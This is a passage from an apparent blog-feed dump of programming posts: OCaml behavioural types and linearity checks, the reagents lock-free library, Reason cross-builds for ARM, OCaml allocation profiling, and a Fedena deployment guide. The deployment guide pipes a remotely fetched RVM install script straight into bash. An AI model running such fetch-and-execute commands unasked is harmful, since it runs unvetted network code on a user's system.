r\nend\n\n\nBehavioural types crucially depend on linear use of the resources. Since OCaml\ndoes not have linear types, there is nothing that prevents writing the following\nfunction that seemingly violates the behavioural contract.\n\nutop # let foo (r : (int, [`Read of [`Stop]]) Ref.ref) =\n         let _, _ = Ref.read r in\n         Ref.read r;;\nval foo :\n  (int, [ `Read of [ `Stop ] ]) Ref.ref -> int * (int, [ `Stop ]) Ref.ref =\n  \u003Cfun>\n\n\nWhile the type of r says that it will be read only once, the function foo\nreads it twice. This non-linear use of r is caught dynamically; the second\nread of r raises LinearityViolation.\n\nutop # let _ = foo (Ref.ref 10);;\nException: LinearityViolation.\n\n\nPolymorphic References\nSince we can accurately track the behaviour of references, we can safely allow\ndifferently typed values to be written and read from the reference. A reference\nthat holds a value of type t can be read multiple times at t before being\nwritten at type u. This protocol is captured by the following type:\n\nmodule type PolyRef =\nsig\n  type ('a,'b) rw_prot\n    constraint 'b = [> `Read of 'a * 'b | `Write of 'c * ('c,_) rw_prot]\n  type 'c ref constraint 'c = ('a,'b) rw_prot\n  ...\nend\n\n\nAs before, the reference holds values of 'a with the behaviour given by 'b.\nThe reference can either by read multiple times at 'a or written once at 'c\nafter which the reference holds values of type 'c. The rest of the operations\nare defined as usual:\n\nmodule type PolyRef =\nsig\n  ...\n  val ref  : 'a -> ('a,'b) rw_prot ref\n  val read  : ('a,[> `Read of 'a * 'b]) rw_prot ref -> 'a * ('a,'b) rw_prot ref\n  val write : ('a,[> `Write of 'b * ('b,'c) rw_prot]) rw_prot ref -> 'b ->\n    ('b,'c) rw_prot ref\n  val branch : ('a, [>] as 'b) rw_prot ref -> (('a, [>] as 'c) rw_prot ref -> 'b) ->\n    ('a, 'c) rw_prot ref\nend\n\n\nWe can now write interesting programs:\n\nutop # let rec foo r =\n  let v,r = read r in\n  let r = write r (string_of_int (v+1)) in\n  let v,r = read r in\n  let r = write r (int_of_string v) in\n  foo r;;\nval foo :\n  (int,\n   [> `Read of int * 'a\n    | `Write of\n        string *\n        (string,\n         [> `Read of string * 'b | `Write of int * (int, 'a) rw_prot ] as 'b)\n        rw_prot ]\n   as 'a)\n  rw_prot PolyRef.ref -> 'c = \u003Cfun>\n\n\nObserve that foo reads r as a integer, updates it as a string, reads it as\na string and then finally writing an integer into it. The inferred type\nreflects this change from int -> string -> int. The implementation of\npolymorphic references uses the unsafe Obj.magic to coerce the contents.\nHowever, the behavioural types ensure that accesses are safe.\n\nmodule PolyRef : PolyRef =\nstruct\n  type ('a,'b) rw_prot\n    constraint 'b = [> `Read of 'a * 'b | `Write of 'c * ('c,_) rw_prot]\n\n  type 'a ref =\n    {contents     : 'b.'b;\n     mutable live : bool} (* For linearity *)\n     constraint 'a = ('b,'c) rw_prot\n\n  let ref v = {contents = Obj.magic v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (Obj.magic r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = Obj.magic v; live = true }\n\n  let branch r _ = check r; fresh r\nend\n\n\nFile descriptors\nWe can utilise behavioural types to apply meaningful restrictions to operations\non file descriptors.\n\nmodule type File_descriptor = sig\n  type 'a t constraint 'a = [>]\n\n  val openfile : string -> Unix.open_flag list -> Unix.file_perm ->\n    ([\u003C `Close | `Write of 'a | `Read of 'a > `Close] as 'a) t\n  val close : [> `Close] t -> unit\n  val read : [> `Read of 'a] t -> bytes -> int -> int -> int * 'a t\n  val write : [> `Write of 'a] t -> bytes -> int -> int -> int * 'a t\n  val mk_read_only  : [> `Read of 'a] t -> ([`Close | `Read of 'a] as 'a) t\n  val mk_write_only : [> `Write of 'a] t -> ([`Close | `Write of 'a] as 'a) t\n\n  val open_stdin  : unit -> ([`Close | `Read of 'a] as 'a) t\n  val open_stdout : unit -> ([`Close | `Write of 'a] as 'a) t\n  val open_stderr : unit -> ([`Close | `Write of 'a] as 'a) t\nend\n\n\nThe File_descriptor module is a thin wrapper around the file descriptors from\nUnix module. The file descriptor obtained through openfile permits a subset\nof operations to read, write and close. The precise set of capabilities is\ndictated by the flags supplied. For example, with O_RDONLY the type of the\nfile descriptor obtained should be ([`Close | `Read of 'a] as 'a) t. The\ntypes of standard streams are also restricted. For example,\n\nutop # open_stderr () |> fun fd -> write fd \"hello\\n\" 0 6;;\nhello\n- : int * ([ `Close | `Write of 'a ] as 'a) t = (6, \u003Cabstr>)\nutop # open_stdin () |> fun fd -> write fd \"hello\\n\" 0 6;;\nError: This expression has type ([ `Close | `Read of 'a ] as 'a) t\n       but an expression was expected of type [> `Write of [>  ] ] t\n       The first variant type does not allow tag(s) `Write\n\n\nFile descriptors can also be made read or write only.\n\nutop # let foo fd =\n         let _, fd = write fd  \"hello\\n\" 0 6 in\n         let fd = mk_read_only fd in\n         write fd \"hello\\n\" 0 6;;\nError: This expression has type ([ `Close | `Read of 'a ] as 'a) t\n       but an expression was expected of type [> `Write of [>  ] ] t\n       The first variant type does not allow tag(s) `Write\n\n\nThe implementation of the module is straightforward.\n\nmodule File_descriptor : File_descriptor = struct\n  open Unix\n\n  type 'a t =\n    {fd : file_descr;\n     mutable live : bool} constraint 'a = [>]\n\n  let mk fd = {fd = fd; live = true}\n\n  let fresh fd = {fd with live = true}\n\n  let check fd =\n    if not fd.live then raise LinearityViolation;\n    fd.live \u003C- false\n\n  let open_stdin () = mk stdin\n  let open_stdout () = mk stdout\n  let open_stderr () = mk stderr\n\n  let openfile file flags perm =\n    let fd = openfile file flags perm in\n    mk fd\n\n  let close fd = check fd; close fd.fd\n\n  let read fd buff ofs len =\n    check fd;\n    (read fd.fd buff ofs len, fresh fd)\n\n  let write fd buff ofs len =\n    check fd;\n    (write fd.fd buff ofs len, fresh fd)\n\n  let mk_read_only fd = check fd; fresh fd\n  let mk_write_only fd = check fd; fresh fd\nend\n\n\n\nTracking Aliases\nThe final example I will discuss is alias tracking.\n\nmodule type Alias = sig\n  type ('a,'b) t constraint 'b = [>]\n  val make   : (unit -> 'a) -> ('a, [`One]) t\n  val dup    : ('a, 'b) t -> ('a,[`Succ of 'b]) t * ('a, [`Succ of 'b]) t\n  val merge  : ('a, [`Succ of 'b]) t -> ('a, [`Succ of 'b]) t -> ('a, 'b) t\n  val free   : ('a, [`One]) t -> ('a -> unit) -> unit\n  val app    : ('a,'b) t -> ('a -> unit) -> unit\nend\n\nmodule Alias : Alias = struct\n  type ('a,'b) t =\n    {v : 'a; mutable live : bool} constraint 'b = [>]\n\n  let fresh a = {a with live = true}\n\n  let check a =\n    if not a.live then raise LinearityViolation;\n    a.live \u003C- false\n\n  let make f = {v = f (); live = true}\n  let dup x = check x; (fresh x, fresh x)\n  let merge x y = check x; check y; fresh x\n  let free x f = check x; f x.v\n  let app x f = f x.v\nend\n\n\nThe type variable 'b tracks aliases as a depth in the aliasing tree. New\nresources are initialised with make, and the resultant resource has type\n('a,[`One]) t indicating that there is just one reference to this resource.\nAliases are created explicitly with dup, which destroys the original\nreference and returns two new references, each one level deeper than the\noriginal reference. Two references from the same level can be merged together\nto obtain a reference at the next higher level, and in doing so destroying the\noriginal references. All of this machinery is to ensure that the resource can\nonly be freed when there is a unique reference.\n\nutop # let r = make (fun _ -> ref 0);;\nval r : (int ref, [ `One ]) t = \u003Cabstr>\nutop # let r1,r2 = dup r;;\nval r1 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nval r2 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # let r11,r12 = dup r1;;\nval r11 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nval r12 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nutop # let r21, r22 = dup r2;;\nval r21 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nval r22 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nutop # let r1 = merge r11 r22;;\nval r1 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # let r2 = merge r12 r21;;\nval r2 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # free (merge r1 r2);;\n- : (int ref -> unit) -> unit = \u003Cfun>\n\n\nConclusion\nPolymorphic variants are quite effective in encoding behavioural types.\nHowever, the absence of linear types in OCaml makes us resort to dynamic tests\nfor linear use of resources. While it is possible to hide the resource under a\nmonad, combining the use of multiple resources would require monad\ntransformers, which is well known to be quite heavyweight in terms of\nprogrammability. Perhaps an effect system would do the trick.",[],{"slug":2675,"title":2676,"link":2677,"pubDate":2678,"contentSnippet":2679,"tags":2680,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"lock-free","Lock-free programming for the masses","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002F2016\u002F06\u002F11\u002Flock-free\u002F","2016-06-11T09:08:00.000Z","Efficient concurrent programming libraries are essential for taking advantage of\nfine-grained parallelism on multicore hardware. In this post, I will introduce\nreagents, a composable, lock-free\nconcurrency library for expressing fine-grained parallel programs on Multicore\nOCaml. Reagents offer a\nhigh-level DSL for experts to specify efficient concurrency libraries, but also\nallows the consumers of the libraries to extend them further without knowing the\ndetails of the underlying implementation.\nMotivation\nDesigning and implementing scalable concurrency libraries is an enormous\nundertaking. Decades of research and industrial effort has led to\nstate-of-the-art concurrency libraries such as\njava.util.concurrent\n(JUC) for the JVM and\nSystem.Collections.Concurrent\n(SCC) for the .NET framework. These libraries are often written by experts and\nhave subtle invariants, which makes them hard to maintain and improve. Moreover,\nit is hard for the library user to safely combine multiple atomic operations.\nFor example, while JUC and SCC provide atomic operations on stacks and queues,\nsuch atomic operations cannot be combined into larger atomic operations.\nOn the other hand software transactional memory (STM) offers\ncomposability,\nbut STM based data structures are generally less efficient than their lock-free\ncounterparts, especially when there is moderate to high levels of contention.\nAaron Turon introduced\nreagents, an expressive and\ncomposable library which retains the performance and scalability of lock-free\nprogramming. Reagents allow isolated atomic updates to shared state, as well as\nmessage passing communication over channels. Furthermore, reagents provide a set\nof combinators for sequential composition à la STM, parallel composition\nà la Join calculus, and\nselective communication à la Concurrent\nML, while being lock-free.\nReagents occupy this sweet-spot between expressivity and performance, and we\nbelieve it could serve as a great default1 for writing fine-grained\nconcurrent programs in Multicore OCaml.\nCombinators\nThe basic reagents combinators are presented below.\ntype ('a,'b) t\n\n(* channel communication *)\nval swap : ('a,'b) endpoint -> ('a,'b) t\n\n(* shared memory *)\nval upd : 'a ref -> ('a -> 'b -> ('a * 'c) option) -> ('b,'c) t\n\n(* sequential composition *)\nval (>>>) : ('a,'b) t -> ('b,'c) t -> ('a,'c) t\n(* conjunction *)\nval (\u003C*>) : ('a,'b) t -> ('a,'c) t -> ('a,'b * 'c) t\n(* disjunction *)\nval (\u003C+>) : ('a,'b) t -> ('a,'b) t -> ('a,'b) t\n\nval run : ('a,'b) t -> 'a -> 'b\n\n\nA reagent value with type ('a,'b) t represents an atomic transaction that\ntakes an input of type 'a and returns a value of type 'b. The basic atomic\noperations are exchanging message on an endpoint of a channel through swap and\nupdating a shared reference through upd. The swap operation blocks the\ncalling thread until a matching swap operation is available on the dual\nendpoint.\nThe atomic reference update operation upd, takes a function which is applied\nto the current value of the reference (of type 'a) and the input value (of\ntype 'b), and is expected to return an optional pair of the new value for the\nreference and a return value (of type 'c). If the update function returns\nNone, then the invoking thread blocks until the reference is updated. Reagent\nimplementation takes care of the blocking and signalling necessary for thread\nwake up.\nThe most important feature of reagents is that it allows composition of reagent\ntransactions in sequence >>> and in parallel \u003C*>, and also to selectively\nchoose one of the available operations \u003C+>. Furthermore, these combinators\nbeing arrows, enable\noptimisations that cover the common case and help reagents achieve performance\ncommensurate to hand-written implementations. Reagents library also exposes\nmonadic combinators for convenience, at the cost of forgoing optimisation\nopportunities.\nA lock-free stack\nThe following is a reagent implementation of the Treiber lock-free\nstack.\nmodule R = Reagent\n\nmodule TreiberStack : sig\n  type 'a t\n  val create  : unit -> 'a t\n  val push    : 'a t -> ('a, unit) R.t\n  val pop     : 'a t -> (unit, 'a) R.t\n  val try_pop : 'a t -> (unit, 'a option) R.t\nend = struct\n  type 'a t = 'a list R.ref\n\n  let create () = R.ref []\n\n  let push r =\n    R.upd r (fun xs x -> Some (x::xs,()))\n\n  let try_pop r = R.upd r (fun l () ->\n    match l with\n    | [] -> Some ([], None)\n    | x::xs -> Some (xs, Some x))\n\n  let pop r = Ref.upd r (fun l () ->\n    match l with\n    | [] -> None\n    | x::xs -> Some (xs,x))\nend\n\n\nWe utilise a shared reference of type 'a list ref to represent the stack and\nuse the upd operation to perform atomic operations on the stack. The important\ntake away from this snippet is that the code is no more complicated than a\nsequential stack implementation. The logic for backoff, retry, blocking and\nsignalling are hidden behind the reagents implementation. In particular, the\npop operation blocks the calling thread until the stack is non-empty. Thus,\nthe experts can write efficient concurrency libraries using reagents while\npreserving readability (and as a consequence maintainability) of code.\nFurthermore, since the stack interface is exposed as reagents, the individual\noperations can be further composed. For example, given two Treiber stacks s1\nand s2, pop s1 >>> push s2 transfers elements atomically between the stacks,\npop s1 \u003C*> pop s2 consumes elements atomically from both of the stacks, and\npop s1 \u003C+> pop s2 consumes an element from either of the stacks. Importantly,\nthe composition preserves the optimisations and blocking\u002Fsignalling behaviours,\nallowing the users of the library to arbitrarily combine and extend the\nfunctionality without knowing about the underlying implementation.\nFeeding the philosophers\nThe parallel composition combinator provides an elegant way to solve the Dining\nPhilosophers\nproblem. The problem\nimagines a set of philosophers seated around a circular table, forever\nalternating between thinking and eating. Forks are placed between adjacent\nphilosophers, and each philosopher can only eat after obtaining both the left\nand right forks. The goal is to design a solution where no philosopher will\nstarve. The problem highlights the issues of deadlock and fairness in concurrent\nprogramming.\nOne way to solve this problem is to model each fork as a pair of endpoints, one\nfor taking and another for dropping the fork.\ntype fork =\n  {drop : (unit,unit) endpoint;\n   take : (unit,unit) endpoint}\n\nlet mk_fork () =\n  let drop, take = mk_chan () in\n  {drop; take}\n\nlet drop f = swap f.drop\nlet take f = swap f.take\n\n\nNow, the solution for a single round of eating can be implemented as follows:\nlet eat l_fork r_fork =\n  ignore @@ run (take l_fork \u003C*> take r_fork) ();\n  (* ...\n   * eat\n   * ... *)\n  spawn @@ run (drop l_fork);\n  spawn @@ run (drop r_fork)\n\n\nWe use take l_fork \u003C*> take r_fork to atomically take both of the forks.\nReagents ensure that the protocol does not deadlock. After eating, we release\nthe forks by spawning lightweight threads. In the next round, the philosophers\nrace for the available forks. If the thread scheduler is fair, then the\nprotocol provides fairness among the philosophers. The complete solution is\navailable\nhere.\nImplementation\nThe key idea behind the implementation is that the reagent transaction executes\nin two phases. The first phase involves collecting all the compare-and-swap\n(CAS) operations necessary for the transaction, and the second phase is invoking\na k-CAS operation (emulated in software). The failure to gather all the\navailable CASes constitutes a permanent failure, causing the thread to explore\nother alternatives in the case of a selective communication or block otherwise.\nThe failure in the second phase means that there is active interference from\nother concurrent threads, in which case the transaction is retried.\nPerformance of the Reagents depends critically on having fine-grained control\nover threads and schedulers for implementing backoff loops, blocking and\nsignalling. However, one of the main ideas of multicore OCaml is not to bake in\nthe thread scheduler into the compiler but rather describe them as libraries. To\nthis end, the reagents library is functorized over the following generic\nscheduler interface:\nmodule type Scheduler = sig\n  (* continuation *)\n  type 'a cont\n  effect Suspend : ('a cont -> 'a option) -> 'a\n  effect Resume  : 'a cont * 'a -> unit\nend\n\n\nThe interface itself only describes the scheduler’s effects, whose behaviour is\ndefined by the\nhandlers.\nperform (Suspend f) applies f to the current continuation, and allows the\nReagent library to stash the thread on the unavailable resource’s wait queue.\nThe return type of f is an option to handle the case when the resource might\nhave become available while suspending. If f returns None, then the control\nreturns to the scheduler. Once the resource becomes available, the reagent\nlibrary performs the Resume effect to resume the suspended thread.\nComparison to STM\nReagents are less expressive than STM, which provides serializability. But in\nreturn, Reagents provide stronger progress guarantee (lock-freedom) over STM\n(obstruction-freedom)2. A reagent transaction operating more than once on\nthe same memory location will fail at runtime. Abstractly, this behaviour is\ndisallowed since it cannot be represented as a k-CAS operation. Due to this\nrestriction, the transaction pop s1 >>> push s1 always fails, and prohibits\nimportant patterns such as atomically pushing or popping multiple values from\nthe same stack. I am currently working on extending the reagents semantics to\nrelax this invariant. The resultant behaviour will be similar to a version of\nsnapshot isolation. While this is weaker than serializability semantics offered\nby the STM, we will retain the benefit of lock-freedom.\nContribute!\nUsing the reagents library, we have implemented a collection of composable\nconcurrent data and synchronization structures such as stacks, queues, countdown\nlatches, reader-writer locks, condition variables, exchangers, atomic counters,\netc. There is great opportunity here to build a standard library for\nfine-grained parallelism for Multicore OCaml, incorporating the latest\ndevelopments in lock-free data structures. There is still work to be done\noptimising the implementation to remove allocations in the fast path, and\nfine-tuning the reagents core.\nContributions to the library are most\nwelcome, and is a great way to contribute to the Multicore OCaml effort. Please\ndo file those issues and submit pull-requests.\nReagents is just a library, and you can implement your own favourite concurrent programming library. ↩\nAnd then there are good arguments to why the semantics should be even weaker. ↩",[],{"slug":2682,"title":2683,"link":2684,"pubDate":2685,"contentSnippet":2686,"tags":2687,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"armed-with-reason","Armed with Reason","https:\u002F\u002Fkcsrk.info\u002Freason\u002Farm\u002F2016\u002F05\u002F16\u002Farmed-with-reason\u002F","2016-05-16T10:00:05.000Z","This is a short tutorial on how to build\nReason apps for an ARM target with the help\nof Docker. I am using Docker for\nMac, which is\nstill under beta program. Using Docker for development has two important\nadvantages over traditional cross-compilation. First, the Reason toolchain comes\npackaged as a Docker image and hence no local installation is necessary.\nSecondly, cross-compilers are often tricky to get right. Docker for Mac comes\nwith multiarch support and hence removes the need for traditional\ncross-compilation.\nSetup\nI will be testing using a Cubietruck\nrunning Linaro Desktop. But these instructions should also work for\nRaspbian, a Debian optimized for the Raspberry pi\nhardware.\nBuild\nFirst get the dockerfile for Reason toolchain and build the image.\n$ mkdir \u002Ftmp\u002Freason_arm\n$ cd \u002Ftmp\u002Freason_arm\n$ wget https:\u002F\u002Fgist.githubusercontent.com\u002Fkayceesrk\u002Fdc37a6ffeeda2dea338550dd4e8ad7ec\u002Fraw\u002F8e136b8b8170758bd5e9c0cacf70fed4f9ce3df1\u002FDockerfile\n$ docker build -t reason-arm .\n\n\nAll set! Let’s build a “Hello, World!” program.\n$ mkdir \u002Ftmp\u002Freason_arm_hello\n$ cd \u002Ftmp\u002Freason_arm_hello\n$ echo 'print_endline \"Hello, Reason!\"' > hello.re\n$ docker run -it -v `pwd`:\u002Fsrc reason-arm\n$ cd \u002Fsrc\n$ rebuild hello.native\n^C\n\n\nThe build artifacts are found in the host machines \u002Ftmp\u002Freason_arm_hello\u002F_build directory.\n$ file _build\u002Fhello.native\n_build\u002Fhello.native: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\u002FLinux 2.6.32, not stripped\n\n\nWe can now transfer the file to the cubietruck and run it. My cubietruck’s IP\naddress is 192.168.0.9.\n$ scp _build\u002Fhello.native linaro@192.168.0.9:\n$ ssh linaro@192.168.0.9\nWelcome to Linaro 13.04 (GNU\u002FLinux 3.4.61+ armv7l)\n\n* Documentation:  https:\u002F\u002Fwiki.linaro.org\u002F\nLast login: Fri May 20 08:35:01 2016 from 192.168.0.3\nlinaro@cubietruck:~$ .\u002Fhello.native\nHello, Reason!",[],{"slug":2689,"title":2690,"link":2691,"pubDate":2692,"contentSnippet":2693,"tags":2694,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"2015-in-review","2015 in Review","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2016\u002F02\u002F15\u002F2015-in-review\u002F","2016-02-15T00:00:00.000Z","2015 was a good year for me. I accomplished a lot of things, and was happy for most part of the year. In no particular order, here are the things that stand out for me:\nWent to HillHacks, and made lots of friends. Helped organize the conference.\nJoined Razorpay in June\nMoved to Bangalore\nAnnounced my book, The Joy of Software Development\nDid lots of speaker things:\n    \nJoy of Software Development talk at IIT Roorkee\nFlash Talks on SDSLabs, CTFs and a few more things at HillHacks\nA full-length talk on the book itself at HillHacks\nDid the HillHacks and HackBeach quizes\nAnnounced my Homeopathy Bug Bounty Program at hackbeach.\nGave a talk on Fun with HTTP at Barcamp Bangalore.\nLearnt some slacklining at hackbeach. Helped with conference scheduling as well.\nMade lots of new friends at Bangalore.\nStarted playing board games, including being a DM at several Dungeons and Dragons sessions.\nStarted quizzing in bangalore as well. Mostly at Cluesday, Vapors.\nReading\nI started with a goal of 20 books for this year, and ended up reading about 28. Tried experimenting with Audiobooks near the year end, and failed. Bought a Kindle paperwhite as well. I tend to read a lot of Fantasy and SF, and this continued in 2015 as well. The best books I read this year (in order):\nLions of Al Rassan [review]\nThe Goblin Emperor [review]\nThe Martian [review]\nA complete list is on Goodreads\nTech\nLaunched hackercouch as a personal project.\nShifted to Arch Linux + i3wm setup for my laptop. See Setup page for more details.\nLeft facebook, mostly because of their stance on Net Neutrality and the FreeBasics debacle in India.",[],{"slug":2696,"title":2697,"link":2698,"pubDate":2699,"contentSnippet":2700,"tags":2701,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"fear-of-success-grounds-failure","Indian startups ecosystem: Fear of failure grounds our success story","https:\u002F\u002Fnadh.in\u002Fblog\u002Ffear-of-success-grounds-failure\u002F","Sat, 26 Dec 2015 00:00:00 +0000","The Indian startup ecosystem has taken shape and exploded in the last few years, and so have the countless stories surrounding them. Unsurprisingly, lessons of unsuccessful ideas and attempts haven’t gotten as much precedence as successful counterparts.",[],{"slug":2703,"title":2704,"link":2705,"pubDate":2706,"contentSnippet":2707,"tags":2708,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"deploying-fedena-using-ubuntu-14-04-html","Deploying Fedena Using Ubuntu 14.04","https:\u002F\u002Faboobacker.in\u002F2015\u002F11\u002F18\u002Fdeploying-fedena-using-ubuntu-14-04.html","2015-11-18T04:00:13.000Z","Install Ruby Dependancies\n\nsudo apt-get update\nsudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties\n\n\nInstall Ruby Using RVM\n\nsudo apt-get install libgdbm-dev libncurses5-dev automake libtool bison libffi-dev\ncurl -L https:\u002F\u002Fget.rvm.io | bash -s stable\nsource ~\u002F.rvm\u002Fscripts\u002Frvm\necho \"source ~\u002F.rvm\u002Fscripts\u002Frvm\" >> ~\u002F.bashrc\nrvm install 1.8.7\nrvm use 1.8.7 --default\nruby -v\n\n\nSetting up MySQL server\nFedena uses mysql, so run,\n\nsudo apt-get install libmysqlclient-dev mysql-server\n\n\nDo remember the mysql password you set during this step, it is required later\nChecking Out modified version version of fedena\nI made some modifications in project fedena to make it easily installable\n\n\ngit clone https:\u002F\u002Fgithub.com\u002Ftachyons\u002Fproject_fedena.git\ncd project_fedena\ncp config\u002Fdatabase.yml.example config\u002Fdatabase.yml\nbundle install\nrake db:create\nbundle exec rake fedena:plugins:install_all\n\n\nInstalling passenger and nginix\n\n# Install passenger PGP key and add HTTPS support for APT\nsudo apt-key adv --keyserver hkp:\u002F\u002Fkeyserver.ubuntu.com:80 --recv-keys 561F9B9CAC40B2F7\nsudo apt-get install -y apt-transport-https ca-certificates\n\n# Add passenger APT repository\nsudo sh -c 'echo deb https:\u002F\u002Foss-binaries.phusionpassenger.com\u002Fapt\u002Fpassenger trusty main > \u002Fetc\u002Fapt\u002Fsources.list.d\u002Fpassenger.list'\nsudo apt-get update\n\n# Install Passenger + Nginx\nsudo apt-get install -y nginx-extras passenger\n\n\nEdit \u002Fetc\u002Fnginx\u002Fnginx.conf and uncomment passenger_root and passenger_ruby. For example, you may see this:\n\n# passenger_root \u002Fsome-filename\u002Flocations.ini;\n# passenger_ruby \u002Fusr\u002Fbin\u002Fpassenger_free_ruby;\n\n\nRemove the ‘#’ characters, like this:\n\npassenger_root \u002Fsome-filename\u002Flocations.ini;\npassenger_ruby \u002Fusr\u002Fbin\u002Fpassenger_free_ruby;\n\n\nNow you can validate the installation using the command\n\nsudo passenger-config validate-install\n\n\nnow create an entry in \u002Fetc\u002Fngnix\u002Fsites.enabled\n\nsudo vim \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fproject_fedena\n\n\nNow modify and paste following text,ie edit your server name and project path\n\nserver {\n    listen       80;\n    server_name  fedena.example.com;\n    location \u002F {\n    \troot   \u002Fyour\u002Ffedena\u002Fdirectory\u002Fpublic;\n     \tpassenger_enabled on;\n    }\n    error_page   500 502 503 504  \u002F50x.html;\n    location = \u002F50x.html {\n        root   html;\n    }\n  \terror_page 413 \u002F413.html;\n   \tlocation = \u002F413.html{\n       root   html;\n       allow all;\n    }\n }\n\n\n\nyou can verify above configuration by adding 127.0.1.1\tfedena.example.com\n in \u002Fetc\u002Fhosts\nNow restart the ngnix server and check fedena.example.com\n\nsudo service ngnix restart\n\n\nReferences\nhttps:\u002F\u002Fwww.phusionpassenger.com\u002Flibrary\u002Finstall\u002Fnginx\u002Finstall\u002Foss\u002Ftrusty\u002F\nhttp:\u002F\u002Faboobacker.in\u002Finstalling-project-fedena-in-14-04\u002F",[],{"slug":2710,"title":2711,"link":2712,"pubDate":2713,"contentSnippet":2714,"tags":2715,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"profiling-the-stack","Profiling the stack","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprofiling\u002F2015\u002F10\u002F27\u002Fprofiling-the-stack\u002F","2015-10-27T17:29:30.000Z","In the last\npost,\nI described a flat allocation profiler for OCaml 4.02 bytecode interpreter.\nIn this post, I’ll describe further developments which add support for call\nstack information and better location information. Lets dive straight to the\nusage:\nEnabling stack profiling\nStack profiling is enabled by setting the environment variable\nCAML_PROFILE_STACK to the intended depth of stack. Suppose we would like to\nattribute any allocation to the current function, we would set\nCAML_PROFILE_STACK=1. To do the same to the current function and its caller,\nwe would set CAML_PROFILE_STACK=2. CAML_PROFILE_STACK=\u003CINFINITY> should\ngive you stack profile all the way down to the first function.\nWhy should I care about the stack depth?\nBecause it affects the program performance. Enabling stack profiling walks the\nstack for every allocation. This has the potential to severely affect the\nprogram performance. Most often, with a flat profile, you’ve tracked the\noffending allocation to some function in the standard library such as1:\nFile \"bytes.ml\", line 59, characters 7-81:\n  C_CALL1 caml_create_string\n\nFile \"src\u002Fbigstring.ml\", line 98, characters 20-37:\n  C_CALL1 caml_create_string\n\n\nAnd all you want is to find out the caller of that standard library function in\nyour code. A stack depth of a small number should provide you this information.\nYou might have to play around with the stack depth to identify what you are\nlooking for.\nProfiling N-queens\nYou can obtain and install the profiling enabled OCaml 4.02\nhere.\nLet us obtain the flat profile first.\n$ wget http:\u002F\u002Fcaml.inria.fr\u002Fpub\u002Fold_caml_site\u002FExamples\u002Foc\u002Fbasics\u002Fqueens.ml\n$ ocamlc -o queens -g queens.ml\n$ CAML_PROFILE_ALLOC=queens.preprof .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof queens.prof\n$ head -n10 queens.prof\nTotal: 77,863 words\nInstr   Words   % of total      Location\n-----   -----   ----------      --------\n2488    31440   40.38%          file \"list.ml\", line 55, characters 32-39\n27681   31440   40.38%          file \"queens.ml\", line 61, characters 46-52\n27775   5895    7.57%           file \"queens.ml\", line 38, characters 2-113\n27759   4112    5.28%           file \"queens.ml\", line 40, characters 33-41\n27687   3930    5.05%           file \"queens.ml\", line 61, characters 14-59\n2403    86      0.11%           file \"pervasives.ml\", line 490, characters 8-63\n5391    44      0.06%           file \"list.ml\", line 20, characters 15-29\n\n\nObserve that we now have the precise location information directly in the\nprofile, whereas\nearlier\none had to manually identify the source location using the instruction\ninformation. In this profile, we see that most allocations were in\nlist.ml:55, which is the List.map function. However, we cannot pin down the\nsource of these allocations in queens.ml from this profile since the profile\nis flat. Let us now obtain the stack allocation profile, which will reveal the\nsource of these allocations in queens.ml.\n$ CAML_PROFILE_ALLOC=queens.preprof CAML_PROFILE_STACK=10000 .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof queens.prof --sort-stack\n$ head -n10 queens.prof\nTotal: 77,863 words\nInstr   Current Cur %   Stack   Stack % Location\n-----   ------- -----   -----   ------- --------\n27836   0       0.00%   76911   98.78%  file \"queens.ml\", line 100, characters 33-42\n27549   0       0.00%   76870   98.72%  file \"queens.ml\", line 85, characters 17-36\n27466   0       0.00%   76473   98.21%  file \"queens.ml\", line 45, characters 18-31\n27715   0       0.00%   65117   83.63%  file \"queens.ml\", line 62, characters 4-22\n27694   0       0.00%   62880   80.76%  file \"queens.ml\", line 61, characters 31-59\n2487    0       0.00%   55020   70.66%  file \"list.ml\", line 55, characters 32-39\n2483    0       0.00%   31440   40.38%  file \"list.ml\", line 55, characters 20-23\n\n\nI’ve chosen a stack depth of 10000 to obtain the complete stack profile of the\nprogram. The option --sort-stack to allocprof sorts the results based on\nthe stack allocation profile. We can now clearly see the stack of functions\nthat perform most allocations. The line\n27836   0       0.00%   76911   98.78%  file \"queens.ml\", line 100, characters 33-42\n\n\nsays that 98.78% of all allocations were performed by the function at\nqueens.ml:100, characters 33-42, and its callees. This isn’t surprising since\nthis function is the top-level main\nfunction!\nMore interesting is the 98.21% of allocations on queens.ml:45. This is the\nrecursive call to the 